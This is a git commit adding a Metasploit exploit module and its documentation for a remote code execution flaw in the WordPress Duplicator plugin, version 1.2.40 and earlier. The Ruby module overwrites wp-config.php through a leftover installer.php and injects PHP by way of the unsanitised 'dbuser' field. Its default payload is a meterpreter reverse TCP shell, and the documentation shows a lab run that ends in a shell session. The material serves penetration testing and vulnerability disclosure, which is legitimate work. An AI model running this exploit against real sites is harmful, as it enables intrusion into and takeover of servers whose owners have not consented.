Added WordPress Duplicator <= 1.2.40 and documentation

2018-11-14 16:39:42 +01:00 · 2018-11-14 16:39:42 +01:00 · 5f9570cbcf
parent 09a3748498
commit 5f9570cbcf
2 changed files with 187 additions and 0 deletions
--- a/documentation/modules/exploit/multi/php/wordpress_duplicator.md
+++ b/documentation/modules/exploit/multi/php/wordpress_duplicator.md
@ -0,0 +1,71 @@
+Duplicator is a WordPress plugin that can be used to create a complete backup of a WordPress instance and restore it on a fresh server. The export method generates 2 files:
+* An ZIP archive with the complete WordPress files and Duplicator specific files:
+  * A copy of the installer.php script: installer-backup.php
+  * A SQL script that will be used to restore the database content: database.sql
+* An installer PHP script to restore the archive installer.php
+
+When the installer.php completes its process, the following files remain in the directory and has to be manually deleted:
+* The ZIP archive
+* database.sql 
+* installer-backup.php 
+* installer-data.sql 
+* installer-log.txt 
+* installer.php 
+
+## Vulnerable application
+
+Install a vulnerable version of WordPress Duplicator (<= 1.2.40) and create a backup.
+Put the install.php and archive files on a clean web server.
+
+## Verification Steps
+
+
+Confirm that check functionality works:
+- [ ] Open a browser to check the installer.php file is accessible
+- [ ] Start `msfconsole`
+- [ ] `use exploit/multi/php/wordpress_duplicator-`
+- [ ] Set the `RHOST`.
+- [ ] Confirm the target is vulnerable: `check`
+- [ ] Confirm that the target is vulnerable: `The target is vulnerable.`
+
+Confirm that command execution functionality works:
+- [ ] Set a payload: `set PAYLOAD php/meterpreter/reverse_tcp`
+- [ ] Set `LHOST` and `LPORT`
+- [ ] Run the exploit: `run`
+- [ ] Confirm you have now a meterpreter session
+
+## Options
+
+**TARGETURI**
+
+The path to the installer.php file to exploit By default, the path is `/installer.php`.
+
+
+## Scenarios
+
+### Meterpreter reverse tcp
+
+```
+msf5 > use exploit/multi/php/wordpress_duplicator 
+msf5 exploit(multi/php/wordpress_duplicator) > set RHOSTS 192.168.56.101
+RHOSTS => 192.168.56.101
+msf5 exploit(multi/php/wordpress_duplicator) > set LHOST 192.168.56.1
+LHOST => 192.168.56.1
+msf5 exploit(multi/php/wordpress_duplicator) > set TARGETURI /installer_vuln.php
+TARGETURI => /installer_vuln.php
+msf5 exploit(multi/php/wordpress_duplicator) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[*] Checking if the wp-config.php file already exists...
+[*] This WordPress was not restored. Creating the wp-config.php file...
+[*] Successfully created the wp-config.php file!
+[*] All good! Injecting PHP code in the wp-config.php file...
+[*] Requesting wp-config.php to execute the payload...
+[*] Sending stage (37775 bytes) to 192.168.56.101
+
+meterpreter > sysinfo 
+Computer    : debian
+OS          : Linux debian 4.9.0-6-amd64 #1 SMP Debian 4.9.88-1+deb9u1 (2018-05-07) x86_64
+Meterpreter : php/linux
+```
+
--- a/modules/exploits/multi/php/wordpress_duplicator.rb
+++ b/modules/exploits/multi/php/wordpress_duplicator.rb
@ -0,0 +1,116 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ManualRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'Snapcreek Duplicator WordPress plugin installer.php code injection',
+      'Description'     => %q{
+        When the WordPress plugin Duplicator restores a backup, it leaves dangerous files in the filesystem such as
+        installer.php and installer-backup.php. These files allow anyone to call a function that overwrite the wp-config.php file
+        AND this function does not sanitize POST parameters before inserting them inside the wp-config.php file, leading to 
+        arbitrary PHP code execution.
+        WARNING: This exploit WILL break the wp-config.php file. If possible try to restore backups of the configuration after the exploit
+        to make the WordPress site work again.
+      },
+      'Author'          => [ 'Julien Legras <julien.legras@synacktiv.com>', 'Thomas Chauchefoin <thomas.chauchefoin@synacktiv.com>' ],
+      'References'     => [
+        ['URL', 'https://www.synacktiv.com/ressources/advisories/WordPress_Duplicator-1.2.40-RCE.pdf'],
+        ['URL', 'https://wpvulndb.com/vulnerabilities/9123']
+      ],
+      'License'         => MSF_LICENSE,
+      'Privileged'      => false,
+      'DisclosureDate'  => 'Aug 29 2018',
+      'DefaultOptions'  =>
+      {
+        'PAYLOAD' => 'php/meterpreter/reverse_tcp'
+      },
+
+      'Platform'        => 'php',
+      'Arch'            => ARCH_PHP,
+      'Targets'         => [['WordPress Duplicator <= 1.2.40', {}]],
+      'DefaultTarget'   => 0))
+
+    register_options([
+      OptString.new('TARGETURI', [true, "The TARGETURI where installer.php or installer-backup.php is located", "/installer.php"]),
+      ])
+  end
+
+  def check
+    tpath = normalize_uri(datastore['TARGETURI'])
+
+    print_status("Checking uri #{rhost+tpath}")
+    response = send_request_raw({ 'uri' => tpath})
+    version = response.body.to_s.scan( /version: ([^<]*)</).last.first
+    return Exploit::CheckCode::Vulnerable if Gem::Version.new(version) <= Gem::Version.new("1.2.40")
+    vprint_error("Server responded with #{response.code}")
+    return Exploit::CheckCode::Safe
+
+  end
+
+  def exploit
+    payload_oneline = payload.encoded.gsub(/\s*#.*$/, "").gsub("\n", "")
+
+    print_status("Checking if the wp-config.php file already exists...")
+    tpath_wp_config = normalize_uri(datastore['TARGETURI'] + '/../wp-config.php')
+    response = send_request_cgi({ 'uri' => tpath_wp_config})
+
+    if response.code == 404 # we have to perform action_step 2 to create the wp-config.php file.
+      print_status("This WordPress was not restored. Creating the wp-config.php file...")
+      # 1. GET the installer.php to retrieve the archive name.
+      response = send_request_cgi({'uri' => normalize_uri(datastore['TARGETURI'])})
+      archive_name = response.body.to_s.scan( /value="([^"]*.zip)"/)
+      if archive_name.length > 0
+        archive_name = archive_name.first.first
+        # 2. Perform the 1st step to actually create the wp-config.php file.
+        response = send_request_cgi({
+          'method' => 'POST',
+          'uri'    => normalize_uri(datastore['TARGETURI']),
+          'vars_post'   => {
+            'action_ajax' => "1",
+            'action_step' => "1",
+            'archive_name' => archive_name,
+            'archive_engine' => "ziparchive",
+            'exe_safe_mode' => "0",
+            'archive_filetime' => "current",
+            'logging' => "1"
+          }
+        })
+        if response.code == 200
+          print_status("Successfully created the wp-config.php file!")
+        else
+          print_error("The archive file #{archive_name} was probably deleted.")
+          return
+        end
+      else
+        print_error("Failed to retrieve the archive name, cannot create the wp-config.php file")
+        return
+      end
+    end
+
+    # 2. Exploit the code injection.
+    print_status("All good! Injecting PHP code in the wp-config.php file...")
+    response = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(datastore['TARGETURI']),
+      'vars_post'   => {
+        'action_ajax' => "3",
+        'action_step' => "3",
+        'dbhost' => rand_text_alphanumeric(20),
+        'dbname' => rand_text_alphanumeric(20),
+        'dbpass' => rand_text_alphanumeric(20),
+        'dbuser' => "');" + payload_oneline + "/*",
+        'dbport' => rand_text_numeric(5)
+      }
+    })
+
+    print_status("Requesting wp-config.php to execute the payload...")
+    response = send_request_cgi({ 'uri' => tpath_wp_config})
+  end
+end